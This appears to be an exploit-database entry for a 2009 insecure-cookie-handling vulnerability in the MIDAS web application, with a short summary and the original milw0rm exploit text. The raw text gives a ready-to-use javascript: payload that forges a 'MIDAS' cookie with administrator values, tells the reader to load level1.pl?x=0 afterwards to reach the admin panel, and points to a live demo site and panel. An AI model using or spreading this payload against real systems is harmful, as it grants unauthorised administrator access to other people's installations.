header-logo
Suggest Exploit
vendor:
MIDAS
by:
HxH
7,5
CVSS
HIGH
Insecure Cookie Handling
613
CWE
Product Name: MIDAS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

MIDAS Insecure Cookie Handling Vulnerability

An attacker can exploit this vulnerability by setting a malicious cookie with the name 'MIDAS' and the value 'admin|Administrator|1|data0n9a|en-US|Default' and then accessing the URL http://[website]/[script]/level1.pl?x=0. This will allow the attacker to gain administrator access to the application.

Mitigation:

The application should validate the cookie values and ensure that they are not malicious.
Source

Exploit-DB raw data:

--------------------------------------------

MIDAS Insecure Cookie Handling Vulnerability

--------------------------------------------

Author.: HxH

Contact: HxH[at]live[dot]at

---------------------------

Script.: MIDAS

Home...: http://mid.as

-------------------------------------------------------------------------------------------------

Exploit: javascript:document.cookie="MIDAS=admin|Administrator|1|data0n9a|en-US|Default; path=/";

Note...: After make cookie go direct to http://[website]/[script]/level1.pl?x=0

-------------------------------------------------------------------------------------------------

Demo...: http://demo.mid.as

Panel..: http://demo.mid.as/level1.pl?x=0

-----------------------------------------

Greetz.: ~ Jiko ~ Sniper Code

-----------------------------

# milw0rm.com [2009-06-22]